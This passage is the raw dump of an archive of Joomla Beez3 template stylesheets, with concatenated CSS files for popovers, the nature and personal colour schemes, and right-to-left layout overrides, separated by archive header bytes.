	-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	white-space: normal;
}
.popover.top {
	margin-top: -10px;
}
.popover.right {
	margin-left: 10px;
}
.popover.bottom {
	margin-top: 10px;
}
.popover.left {
	margin-left: -10px;
}
.popover-title {
	margin: 0;
	padding: 8px 14px;
	font-size: 14px;
	font-weight: normal;
	line-height: 18px;
	background-color: #f7f7f7;
	border-bottom: 1px solid #ebebeb;
	-webkit-border-radius: 5px 5px 0 0;
	-moz-border-radius: 5px 5px 0 0;
	border-radius: 5px 5px 0 0;
}
.popover-title:empty {
	display: none;
}
.popover-content {
	padding: 9px 14px;
	min-height: 33px;
}
.popover .arrow,
.popover .arrow:after {
	position: absolute;
	display: block;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
}
.popover .arrow {
	border-width: 11px;
}
.popover .arrow:after {
	border-width: 10px;
	content: "";
}
.popover.top .arrow {
	left: 50%;
	margin-left: -11px;
	border-bottom-width: 0;
	border-top-color: #999;
	border-top-color: rgba(0,0,0,0.25);
	bottom: -11px;
}
.popover.top .arrow:after {
	bottom: 1px;
	margin-left: -10px;
	border-bottom-width: 0;
	border-top-color: #fff;
}
.popover.right .arrow {
	top: 50%;
	left: -11px;
	margin-top: -11px;
	border-left-width: 0;
	border-right-color: #999;
	border-right-color: rgba(0,0,0,0.25);
}
.popover.right .arrow:after {
	left: 1px;
	bottom: -10px;
	border-left-width: 0;
	border-right-color: #fff;
}
.popover.bottom .arrow {
	left: 50%;
	margin-left: -11px;
	border-top-width: 0;
	border-bottom-color: #999;
	border-bottom-color: rgba(0,0,0,0.25);
	top: -11px;
}
.popover.bottom .arrow:after {
	top: 1px;
	margin-left: -10px;
	border-top-width: 0;
	border-bottom-color: #fff;
}
.popover.left .arrow {
	top: 50%;
	right: -11px;
	margin-top: -11px;
	border-right-width: 0;
	border-left-color: #999;
	border-left-color: rgba(0,0,0,0.25);
}
.popover.left .arrow:after {
	right: 1px;
	border-right-width: 0;
	border-left-color: #fff;
	bottom: -10px;
}

/* Bootstrap overrides anhiliation
 * @since 3.2
 */
body#shadow {
    line-height: 1.5em;
}
body .nav-pills > .active > a, body .nav-pills > .active > a:hover, body .nav-pills > .active > a:focus {
    background-color: transparent;
}
body .nav-pills > li > a {
    border-radius: 0px;
    line-height: 1.5em;
}
body a {
    text-decoration: underline;
}
body input[type="text"].search-query {
    line-height: 1.5em;
    height: auto;
    border-radius: 4px;

}
/* Text alignments */
.text-left {
	text-align: left;
}
.text-right {
	text-align: right;
}
.text-center {
	text-align: center;
}

/* Component pop-up */
.container-popup {
	padding: 28px 10px 10px 10px;
}
PK!Q��**beez3/css/nature.cssnu&1i�/*
 * @author ( Angie Radtke )
*/


/* ##########################  general  ########################### */

body
{
	font-family: arial, helvetica, sans-serif;
	background:#fff;
	color:#444
}

h3 {
	color: #555
}

h2 a {
	text-decoration: none
}

h2, .moduletable h3 {
	border-bottom: solid 1px #ddd;
}

.items-row h2
{border-top: solid 1px #ddd;
}

a:link,
a:visited
{
	color:#0A5E69
}

a:hover,
a:active,
a:focus
{
	background:#0A5E69;
	color:#FFF;
}

/* ##########################  logo  ########################### */

.logoheader
{
	border-top:solid 1px transparent;
	color:#fff;
	max-width: 1050px;
	margin:37px auto;
	min-height:20px;
	margin-bottom:0;

}
.logoheader h1#logo
{padding:20px 10px 0px 10px; }
.logoheader h1#logo  span.header1 {padding:0}

/* ##########################  header  ########################### */

#all {padding-top:13em}
#line { position:relative; max-width:1050px; margin:0 auto; text-align:right; right:0;  top:0em}
#header
{
	background: #004746; /* Old browsers */
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#185359", endColorstr="#007774");
	background: -moz-linear-gradient(top,  #004746 0%, #0a5e69 25%, #185359 18%); /* FF3.6+ */
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#004746), color-stop(25%,#0a5e69), color-stop(18%,#185359)); /* Chrome,Safari4+ */
	background: -webkit-linear-gradient(top,  #004746 0%,#0a5e69 25%,#185359 18%); /* Chrome10+,Safari5.1+ */
	background: -o-linear-gradient(top,  #004746 0%,#0a5e69 25%,#185359 18%); /* Opera 11.10+ */
	background: -ms-linear-gradient(top,  #004746 0%,#0a5e69 25%,#185359 18%); /* IE10+ */
	background: linear-gradient(top,  #004746 0%,#0a5e69 25%,#185359 18%); /* W3C */
	position:absolute;
	left:0;
	top:0;
	width:99.9%;
	padding:0;
}
/* green background */
.button:hover, button:hover, p.readmore a:hover,
.pagenav a:hover, .pagenav a:active,  .pagenav a:focus,  #advanced-search-toggle:hover,  #advanced-search-toggle:active,  #advanced-search-toggle:focus,
.profile-edit a:hover, .profile-edit a:active, .profile-edit a:focus,
#fontsize a:hover,  #fontsize a:active,  #fontsize a:focus,#mobile_select h2 a
	{

	color: #fff;
	background: #008885; /* Old browsers */


	background-color: hsl(165, 27%, 27%) ;
	 background-repeat: repeat-x;
	  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#008885", endColorstr="#004746");
	   background-image: -khtml-gradient(linear, left top, left bottom, from(#008885), to(#004746));
	   background-image: -moz-linear-gradient(top, #008885, #004746);
background-image: -ms-linear-gradient(top, #008885, #004746);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #008885), color-stop(100%, #004746));
background-image: -webkit-linear-gradient(top, #008885, #004746);
background-image: -o-linear-gradient(top, #008885, #004746);
background-image: linear-gradient(#008885, #004746);
border-color: #004746 #004746 hsl(165, 27%, 22.5%);
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.29);
-webkit-font-smoothing: antialiased;
}

/* ++++++++++++++ header  menu ++++++++++++++ */

#header ul.menu
{

	border:0;
	list-style-type:none;
	border-radius:0;
	overflow:hidden;
	margin:0 auto ;
	text-align:right;
	position:absolute;
	top:0;
	right:10px;
}

#header ul.menu li
{
	border:0;

}
#header ul.menu a {
	box-shadow:none;
	border-bottom:0
	}
#header ul.menu li a:link,
#header ul.menu li a:visited
{
	color:#fff;
	border:0;
	border-right:solid 1px #237D85;
	box-shadow: none;
	background:transparent;
	padding:10px ;
	display:inline-block
}
#header ul.menu li:first-child a {border-radius:0}
#header ul.menu li a:hover,
#header ul.menu li a:active,
#header ul.menu li a:focus
{
	color:#333;
	background:#bddfb3;
	padding:10px
}

#header ul li.active a:link,
#header ul li.active a:visited
{
	color:#333;
	border-right:solid 1px #237D85;
	background:#bddfb3;
	padding: 10px  ;

}

#fontsize a , #fontsize h3 {color:#fff}
/*  grey background */
.button, button , p.readmore a ,
 .pagenav a:link, .pagenav a:visited, #advanced-search-toggle , .profile-edit a:link,.profile-edit a:visited,  h3.js_heading
 {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #FFFFFF, #E6E6E6);
	background-repeat: repeat-x;
	border:solid 1px #ccc;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	color: #004746;
}


/* ++++++++++++++++++++++  navigation  ++++++++++++++++++++++++++  */

.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;

}
#header ul.menu {
	border-color: #D5D5D5;
}

ul.menu a:hover,
ul.menu a:active,
ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #FFFFFF, #E6E6E6);
	background-repeat: repeat-x;
	background: url(../images/arrow.png) no-repeat right center;
	color: #004746;

}


/* ++++++++++++++++   highlighting active menuitem  +++++++++++++++++++ */

ul.menu li.active a,ul.menu  li.active ul li.active a,
ul.menu  li.active ul li.active  ul li.active a,
ul.menu  li.active ul li.active  ul li.active ul li.active  a ,
ul.menu  li.active ul li.active  ul li.active ul li.active ul li.active a
{font-weight:bold; }
ul.menu  li.active ul li a,
ul.menu  li.active ul li.active  ul li a,
ul.menu  li.active ul li.active  ul li.active ul li  a,
ul.menu  li.active ul li.active  ul li.active ul li.active ul li a
{font-weight:normal}

ul.menu a
{
	box-shadow:0 1px 0 #fff;
	border-bottom:solid 1px #ddd;

}

ul.menu ul a {
	background: #e5e5e5;
	margin-bottom:1px
}

ul.menu ul ul ul a {
	background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center;

}

ul.menu ul ul ul ul a {
	background: #fff;
}

/* +++++++++++++++++  content  +++++++++++++++ */


.article-info {
	background-color: #fbfbfb;
	background-image: -moz-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -ms-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff),
		to(#f5f5f5) );
	background-image: -webkit-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -o-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: linear-gradient(top, #ffffff, #f5f5f5);
	background-repeat: repeat-x;
	filter: progid : DXImageTransform.Microsoft.gradient ( startColorstr =
		'#ffffff', endColorstr = '#f5f5f5', GradientType = 0 );
	border: 1px solid #ddd;
	-webkit-box-shadow: inset 0 1px 0 #ffffff;
	-moz-box-shadow: inset 0 1px 0 #ffffff;
	box-shadow: inset 0 1px 0 #ffffff;
}

ul.menu a:link,ul.menu a:visited {
	color: #444;
}


#footer-inner, #footer , #footer-outer {
	background: #f5f5f5;
}
#footer-sub {background:#555;}
#footer {background:#555; max-width:1025px; margin:0 auto; }
#footer a {color:#fff}

.box1
{border-right:solid 1px #ccc}
.box3
{border-left:solid 1px #ccc}
#bottom  ul li a
{background-image:none;
padding-left:0}

/* +++++++++++++++++++++++  SLIDER  ++++++++++++++++++++  */

.panel h3.pane-toggler a
{
	background: url(../images/slider_plus.png) right  top no-repeat;
	color:#333
}
.panel h3.pane-toggler-down a
{
	background: url(../images/slider_minus.png) right  top no-repeat;
	border-bottom:solid 1px #ddd;
	color:#333
}

/*  +++++++++++++++++   Tabs ++++++++++++++++++++++  */

ul.tabs li,
dl.tabs dt h3 a:link,
dl.tabs dt h3 a:visited
{
	background:#f5f5f5 url(../images/nature/box.png) repeat-x;

}
ul.tabs li a:link,
ul.tabs li a:visited,
dl.tabs dt a
{
	color:#333;
	border:solid 1px #ddd; border-bottom:0
}

ul.tabs li a:hover,
ul.tabs li a:active,
ul.tabs li a:focus
{
	color:#000
}

.tabcontent, div.current
{
	background:#fff;
	color:#000;
	border:solid 1px #ddd;
}

.tabcontent .linkclosed
{
	color:#000;
	border-bottom:solid 1px #e5e5e5;
}

ul.tabs li a.linkopen,
dl.tabs dt.open  h3 a:link,
dl.tabs dt.open  h3 a:visited
{
	background:#fff;
	color:#333;
	border-radius: 5px 5px 0px 0px;
}

ul.tabs li a.linkclosed:hover,
ul.tabs li a.linkclosed:active,
ul.tabs li a.linkclosed:focus,
ul.tabs li a.linkopen:hover,
ul.tabs li a.linkopen:active,
ul.tabs li a.linkopen:focus
{
	background:#555;
	color:#fff
}


/* +++++++++++++++++  Pagination +++++++++++++++ */

.pagination span,
.pagination span  a:hover {
	color: #999999;
	background-color: #f5f5f5;
}

/* active item */
span.pagenav
{
background:#0A5E69;
color:#fff
}

.pagination-start span.pagenav,
.pagination-prev  span.pagenav,
.pagination-end span.pagenav,
.pagination-next span.pagenav

{
background-color:#f5f5f5;
color:#444
}

/* +++++++++++++  table display  Catgegories table, contact etc, ++++++++++++++++++++* */

table {border:solid 1px #ddd}
table th
 {
	background-color: #0A5E69;;
	color: #fff;
}
table th a:link,
table th a:visited
{color:#fff}
tr.odd, tr.cat-list-row1 {background:#f8f8f8}
table  tr:hover td,
table tr:hover th {
  background-color: #FEFDE2;
}

/* responsive */
#mobile_select h2 {border:0; margin:-17px 0 0 0; padding:0; background:#004746;text-align:right}
#mobile_select h2 a {
display:inline-block;
font-size:0.8em;
border-radius:4px 4px 0 0;
padding:6px;
font-size:0.75em;
margin-right:5px;
}

@media only screen and (max-width: 480px) {

	  img {
  max-width: 100%;
  height: auto;
  border: 0;
  -ms-interpolation-mode: bicubic;
}

	#fontsize{display:none}
	#nav,#wrapper2,#wrapper,.cols-3 .column-1,.cols-3 .column-2,.cols-3 .column-3,#right,.box,#header form
		{
		float: none;
		width: 100%
	}
	#header {padding-top:3em; position:relative; margin:0; max-height:auto !important; }
	#header form  {margin:0}
	#all {padding-top:0}
	.logoheader {background:#004746 ; min-height:100px;margin:0 }
	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd;
	}
	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100% ;
		min-width:100%;
		margin: 0 0px;
		background:#0A5E69;
		position:absolute
	}
	#header form input {
		float: none; margin-bottom:4px
	}
	#menuwrapper { margin-top:10px; background:#fff; padding:10px; width:97%}
	#header ul.menu {position:relative; top:0;left:20px; right:20px; margin:0; width:90%; border-radius:4px; text-align:left; border:0}
	#header ul.menu li:first-child a {border-radius: 4px 4px 0 0}
	#header ul.menu li:last-child a {border-radius:0 0 4px 4px }
	#header ul.menu li a:link,
	#header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-right:0;
		border-bottom: solid 1px #ccc;
		background:#eee;
		color:#444
	}
}

@media only screen and (min-width: 600px) {
}

@media only screen and (min-width: 768px) {
}

@media only screen and (min-width: 992px) {
}

@media only screen and (min-width: 1382px) { /* Styles */
}

@media only screen and (-webkit-min-device-pixel-ratio: 1.5) , only screen and
		(min--moz-device-pixel-ratio: 1.5) , only screen and
	(min-device-pixel-ratio: 1.5) { /* Styles */
}
PK!�Hd-d-beez3/css/personal.cssnu&1i�body {
	background: #eee
}

h3 {
	color: #555
}

h2 a {
	text-decoration: none
}

h2,.moduletable h3, .items-leading h2 {
	border-bottom: solid 1px #ddd;
}

.items-row h2 {
	border-top: solid 1px #ddd;
	border-bottom: solid 1px #ddd;
}

a:link,a:visited {
	color: #095197
}

a:hover,a:active,a:focus {
	background: #095197;
	color: #FFF;
}

.logoheader {
	background: url(../images/personal/personal2.png) no-repeat right
		bottom #0C1A3E;
	color: #FFFFFF;
	min-height: 250px;
}

#all {
	background: #FFFFFF;
	color: #444;
}

#shadow #all {
	box-shadow: 0px 20px 10px #555555
}

#header ul.menu {
  background-color:#ddd;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#eeeeee", endColorstr="#dddddd");
  background-image: -khtml-gradient(linear, left top, left bottom, from(#eeeeee), to(#dddddd));
  background-image: -moz-linear-gradient(top, #eeeeee, #dddddd);
  background-image: -ms-linear-gradient(top, #eeeeee, #dddddd);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #eeeeee), color-stop(100%, #dddddd));
  background-image: -webkit-linear-gradient(top, #eeeeee, #dddddd);
  background-image: -o-linear-gradient(top, #eeeeee, #dddddd);
  background-image: linear-gradient(#eeeeee, #dddddd);
  border-color: #b2b2b2 #b2b2b2 hsl(114, 0%, 62.5%);

  text-shadow: 0 1px 1px rgba(255, 255, 255, 0.49);
  -webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	color: #095197;
	border: solid 1px #ddd;
	border: 1px solid #e5e5e5;
	text-transform: uppercase;
}

#header ul.menu a:link,#header ul.menu a:visited {
	color: #333;
	display: inline-block;
	font-weight: bold;
	text-decoration: none;
	padding: 0px 10px;
	margin: 0;
	display: inline-block;
	margin: 0 0 0;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0px 0px #f5f5f5;
}

/*  grey background */
.button,button,p.readmore a,#header input.button,.pagenav a:link,.pagenav a:visited,#advanced-search-toggle,.profile-edit a:link,.profile-edit a:visited,h3.js_heading
	{
  background-color:#ddd;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#ffffff", endColorstr="#dddddd");
  background-image: -khtml-gradient(linear, left top, left bottom, from(#ffffff), to(#dddddd));
  background-image: -moz-linear-gradient(top, #ffffff, #dddddd);
  background-image: -ms-linear-gradient(top, #ffffff, #dddddd);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #ffffff), color-stop(100%, #dddddd));
  background-image: -webkit-linear-gradient(top, #ffffff, #dddddd);
  background-image: -o-linear-gradient(top, #ffffff, #dddddd);
  background-image: linear-gradient(#ffffff, #dddddd);
  border-color: #b2b2b2 #b2b2b2 hsl(114, 0%, 62.5%);

  text-shadow: 0 1px 1px rgba(255, 255, 255, 0.49);
  -webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	color: #095197;
	border: solid 1px #ddd
}

/* +++++++++++++  table display  Categories table, contact etc, ++++++++++++++++++++* */
table {
	border: solid 1px #ddd
}

table th {
	background-color: #0074cc;
	color: #fff;
	background-image: -moz-linear-gradient(top, #095197, #1B6BA5);
	background-image: -ms-linear-gradient(top, #095197, #1B6BA5);
	background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#095197),
		to(#1B6BA5) );
	background-image: -webkit-linear-gradient(top, #095197, #1B6BA5);
	background-image: -o-linear-gradient(top, #095197, #1B6BA5);
	background-image: linear-gradient(top, #095197, #1B6BA5);
	background-repeat: repeat-x;
	filter: progid :   DXImageTransform.Microsoft.gradient (   startColorstr
		=
		 '#095197', endColorstr =   '#1B6BA5', GradientType =   0 );
	border-color: #0055cc #0055cc #003580;
	border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
	filter: progid :   dximagetransform.microsoft.gradient (   enabled =
		false );
}

table th a:link,table th a:visited {
	color: #fff
}

tr.odd,tr.cat-list-row1 {
	background: #f8f8f8
}

table  tr:hover td {
	background: #FEFDE2;
}

/* blue background */
.button:hover,
.button:active,
.button:focus,
button:hover,
p.readmore a:hover,
#header ul.menu a:hover,
#header ul.menu a:active,
#header ul.menu a:focus,
.pagenav a:hover,
.pagenav a:active,
.pagenav a:focus,
#advanced-search-toggle:hover,
#advanced-search-toggle:active,
#advanced-search-toggle:focus,
.profile-edit a:hover,
.profile-edit a:active,
.profile-edit a:focus,
#fontsize a:hover,#fontsize a:active,#fontsize a:focus,
#mobile_select h2 a
	{
	background-color: #000000;
	color: #fff;

  background-color:#095197;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#0087d1", endColorstr="#095197");
  background-image: -khtml-gradient(linear, left top, left bottom, from(#0087d1), to(#095197));
  background-image: -moz-linear-gradient(top, #0087d1, #095197);
  background-image: -ms-linear-gradient(top, #0087d1, #095197);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #0087d1), color-stop(100%, #095197));
  background-image: -webkit-linear-gradient(top, #0087d1, #095197);
  background-image: -o-linear-gradient(top, #0087d1, #095197);
  background-image: linear-gradient(#0087d1, #095197);
  border-color: #00456b #095197 hsl(201, 100%, 16%);
  color: #fff ;
  text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.33);
  -webkit-font-smoothing: antialiased;



}

/* +++++++++++++++++  Pagination +++++++++++++++ */
.pagination span,.pagination span  a:hover {
	color: #999999;
	background-color: #f5f5f5;
}

/* active item */
span.pagenav {
	background: #095197;
	color: #fff
}

.pagination-start span.pagenav,.pagination-prev  span.pagenav,.pagination-end span.pagenav,.pagination-next span.pagenav
	{
	background-color: #f5f5f5;
	color: #444
}

/* +++++++++++++++++  content  +++++++++++++++ */
.article-info {
	background-color: #fbfbfb;
	background-image: -moz-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -ms-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff),
		to(#f5f5f5) );
	background-image: -webkit-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -o-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: linear-gradient(top, #ffffff, #f5f5f5);
	background-repeat: repeat-x;
	filter: progid :   DXImageTransform.Microsoft.gradient (   startColorstr
		=
		 '#ffffff', endColorstr =   '#f5f5f5', GradientType =   0 );
	border: 1px solid #ddd;
	-webkit-box-shadow: inset 0 1px 0 #ffffff;
	-moz-box-shadow: inset 0 1px 0 #ffffff;
	box-shadow: inset 0 1px 0 #ffffff;
}

ul.menu a:link,ul.menu a:visited {
	color: #444;
}

/* ++++++++++++++++++++++  menu ++++++++++++++++++++++++++  */
.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;
}

#header ul.menu {
	border: solid 1px #D5D5D5;
	box-shadow: 0 1px 0 #FFFFFF inset, 0 1px 5px rgba(0, 0, 0, 0.1);
}

#header ul.menu a {
	box-shadow: none;
	border-bottom: 0
}

ul.menu a:hover,ul.menu a:active,ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #FFFFFF, #E6E6E6);
	background-repeat: repeat-x;
	background: url(../images/arrow.png) no-repeat right center;
	color: #095197
}

/* ++++++++++++++++   highlighting active menuitem  +++++++++++++++++++ */
ul.menu li.active a,ul.menu  li.active ul li.active a,ul.menu  li.active ul li.active  ul li.active a,ul.menu  li.active ul li.active  ul li.active ul li.active  a,ul.menu  li.active ul li.active  ul li.active ul li.active ul li.active a
	{
	font-weight: bold;
}

ul.menu  li.active ul li a,ul.menu  li.active ul li.active  ul li a,ul.menu  li.active ul li.active  ul li.active ul li  a,ul.menu  li.active ul li.active  ul li.active ul li.active ul li a
	{
	font-weight: normal
}

ul.menu a {
	box-shadow: 0 1px 0 #fff;
	border-bottom: solid 1px #ddd;
	text-shadow: 0 1px 0 #fff
}

ul.menu ul a {
	background: #e5e5e5;
	margin-bottom: 1px
}

ul.menu ul ul ul a {
	background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center;
}

ul.menu ul ul ul ul a {
	background: #fff;
}

/* +++++++++++++++++++++++  SLIDER  ++++++++++++++++++++  */
.panel h3.pane-toggler a {
	background: url(../images/slider_plus.png) right top no-repeat;
	color: #333
}

.panel h3.pane-toggler-down a {
	background: url(../images/slider_minus.png) right top no-repeat;
	border-bottom: solid 1px #ddd;
	color: #333
}

/*  +++++++++++++++++   Tabs ++++++++++++++++++++++  */
ul.tabs li,dl.tabs dt h3 a:link,dl.tabs dt h3 a:visited {
	background: #f5f5f5 url(../images/nature/box.png) repeat-x;
}

ul.tabs li a:link,ul.tabs li a:visited,dl.tabs dt a {
	color: #333;
	border: solid 1px #ddd;
	border-bottom: 0
}

ul.tabs li a:hover,ul.tabs li a:active,ul.tabs li a:focus {
	color: #000
}

.tabcontent,div.current {
	background: #fff;
	color: #000;
	border: solid 1px #ddd;
}

.tabcontent .linkclosed {
	color: #000;
	border-bottom: solid 1px #e5e5e5;
}

ul.tabs li a.linkopen,dl.tabs dt.open  h3 a:link,dl.tabs dt.open  h3 a:visited
	{
	background: #fff;
	color: #333;
	border-radius: 5px 5px 0px 0px;
}

ul.tabs li a.linkclosed:hover,ul.tabs li a.linkclosed:active,ul.tabs li a.linkclosed:focus,ul.tabs li a.linkopen:hover,ul.tabs li a.linkopen:active,ul.tabs li a.linkopen:focus
	{
	background: #555;
	color: #fff
}

#footer-inner,#footer {
	background: #f5f5f5;
	box-shadow: 0px 20px 10px #555
}

#footer {
	background: #555;
	max-width: 1025px;
	margin: 0 auto;
	box-shadow: 0px 0px 10px #555555;
	color: #fff
}

#footer a {
	color: #fff;
	background: none
}

#bottom a {
	background: none
}

.box1 {
	border-right: solid 1px #ccc
}

.box3 {
	border-left: solid 1px #ccc
}

#bottom  ul li a {
	background-image: none;
	padding-left: 0
}
















/* responsive */
#mobile_select h2 {border:0; margin:-17px 0 0 0; padding:0; background:#0C1D43;text-align:right}
#mobile_select h2 a {
display:inline-block;
font-size:0.8em;
border-radius:4px 4px 0 0;
padding:6px;
font-size:0.75em;
margin-right:5px;
}



@media only screen and (max-width: 480px) {

	img {
  max-width: 100%;
  height: auto;
  border: 0;
  -ms-interpolation-mode: bicubic;
}


	#fontsize{display:none}
	#nav,#wrapper2,#wrapper,.cols-3 .column-1,.cols-3 .column-2,.cols-3 .column-3,#right,.box,#header form
		{
		float: none;
		width: 100%
	}
	#header {padding-top:3em}
	#header form  {margin:0}
	.logoheader {background:#0C1D43; min-height:100px; margin:0}
	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd;
	}
	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100% ;
		min-width:100%;

		margin: 0 0px; background:#095197;
	}
	#header form input {
		float: none; margin-bottom:4px
	}
	#menuwrapper { margin-top:10px; }
	#header ul.menu {position:relative; top:0;left:20px; right:20px; margin:0; width:90%; border-radius:4px}
	#header ul.menu li:first-child a {border-radius: 4px 4px 0 0}
	#header ul.menu li:last-child a {border-radius:0 0 4px 4px }
	#header ul.menu li a:link,
	#header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-bottom: solid 1px #ccc
	}
}

@media only screen and (min-width: 600px) {
}

@media only screen and (min-width: 768px) {
}

@media only screen and (min-width: 992px) {
}

@media only screen and (min-width: 1382px) { /* Styles */
}

@media only screen and (-webkit-min-device-pixel-ratio: 1.5) , only screen and
		(min--moz-device-pixel-ratio: 1.5) , only screen and
	(min-device-pixel-ratio: 1.5) { /* Styles */
}
PK!�0���beez3/css/nature_rtl.cssnu&1i�h1#logo {
	padding: 0.6em 20px 10px 10px;
}

#header ul.menu {
	left: 0;
	right: auto;
}
#logo span {
    padding-right: 2px;
}
PK!V
�U�"�"beez3/css/template_rtl.cssnu&1i�/**
 * @author Design & Accessible Team ( Angie Radtke  )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */


 #all
{
	text-align: right;
}

#wrapper
{
	float:right;
}


#logo span
{
	padding-right:15px;}


h1#logo{
	font-family: 'Titillium Maps',  Arial;
	padding:0.9em 20px 20px 10px;
	/*text-transform:uppercase;*/
	text-align:right;
}

#logo
{
	margin-top:0.6em;
	margin-left:10px;
	/* position:absolute;*/
	display:block;
	padding:20px 20px 20px 10px;
	width:425px;
	padding-top:0.6em;
	font-weight:normal;
	line-height:1em;
	font-size:3em;
}

.logoheader
{
	text-align:right;
}

/* ##########################  header  ########################### */

#header
{
	font-size:1em;
	position:relative
}

#header ul.menu {
	text-align: right;
}

/* ++++++++++++++  search box+font options ++++++++++++++ */
#line {
	left: 20px;
	margin-right: -10px;
	right: auto;
	text-align: left;
}

/* ++++++++++++++  breadcrumbs   ++++++++++++++ */

#breadcrumbs {
	/*display: block;*/
	background: none;
	float: right;
	text-align: right;
	width: 100%;
}

#breadcrumbs *
{
	text-align:right;
	float: right;

}
/* for IE7 and less */
*:first-child+html .breadcrumbs, * html .breadcrumbs {
	width: 100%;
}
#breadcrumbs
{
	margin:15px 5px 15px 0px;
}
#breadcrumbs img
{
	padding: 4px 5px 0px 5px;
}

#breadcrumbs .showHere {
	margin-left: 4px;
}
ul.menu li a:link,ul.menu li a:visited {
	background: url(../images/nature/karo.gif) no-repeat scroll right 14px;
	padding-right: 10px;
}

ul.menu li {
	text-align: right;
}

ul.menu li.active ul li a:link,
ul.menu li.active ul li a:visited
{
	padding-right: 20px;
}

ul.menu li.active ul li.active a:link,
ul.menu li.active ul li.active a:visited
{
	padding-right: 20px;
}

ul.menu li.active ul li.active ul li a:link,
ul.menu li.active ul li.active ul li a:visited
{
	padding-right: 33px;
}

ul.menu li.active  ul li.active  ul li.active  ul li  a:link,
ul.menu li.active  ul li.active  ul li.active  ul li a:visited
{
	padding: 3px 47px 3px 2px;
	background:#fff url(../images/nature/arrow_small_rtl.png) no-repeat scroll right 8px;
}

ul.menu li.active  ul li.active  ul li.active  ul li.active	ul li  a:link,
ul.menu li.active  ul li.active  ul li.active  ul li.active	ul li a:visited
{
	padding-right:30px;
}

h3 {
	text-align: right
}

h3.js_heading a {
	position: absolute;
	right: auto;
	left: 5px
}

.box {
	text-align: right
}

ul.newsfeed {
	text-align: right
}

a.readmore:link,a.readmore:visited,.readmore a:link,.readmore a:visited
	{
	background: url(../images/nature/arrow1_rtl.gif) repeat-x scroll right top;
	padding-right: 10px !important
}

.readmore a:hover, .readmore a:active, .readmore a:focus,
a.readmore a:hover, a.readmore a:active, a.readmore a:focus
{
	background: url(../images/nature/arrow2_rtl.gif) no-repeat right 6px #555 !important;
}

.mailto-close {
	left: 5px !important;
	right: auto !important;
}

* html .mailto-close {
	left: 0;
	position: absolute;
	right: 340px !important
}

/* personal.css overrides */

.panel h3.pane-toggler a
{
	background:#f5f5f5 url(../images/slider_plus_rtl.png) left top no-repeat;
}
.panel h3.pane-toggler-down a
{
	background:#f5f5f5  url(../images/slider_minus_rtl.png) left top no-repeat;
	border-bottom:solid 1px #ddd;
}

.form-required
{
	background-position: right;
}

input.button,
button.button
{
	background:#FFFFFF url(../images/nature/arrow1_rtl.gif) no-repeat right top;
}

/* layout.css overrides */

#main ul
{
	padding:0 15px 0 0;
	margin:10px 0 10px 0px;
}

#main ol
{
	padding:0 20px 0 0;
	margin:10px 0 10px 0px;
}

.contact-email label
{
	width:17em;
	float:right;
}

#contact-email-copy
{
	float:right;
	margin-left:10px;
}

table.weblinks th, table.category th {
	text-align: right;
}

table th, table td {
	text-align: right;
}

dl.tabs {
	float: right;
	margin: 50px 0 0 0;
	z-index: 50;
	clear:both;
}

dl.tabs dt {
	float: right;
	padding: 4px 10px;
	border-left: 1px solid #ccc;
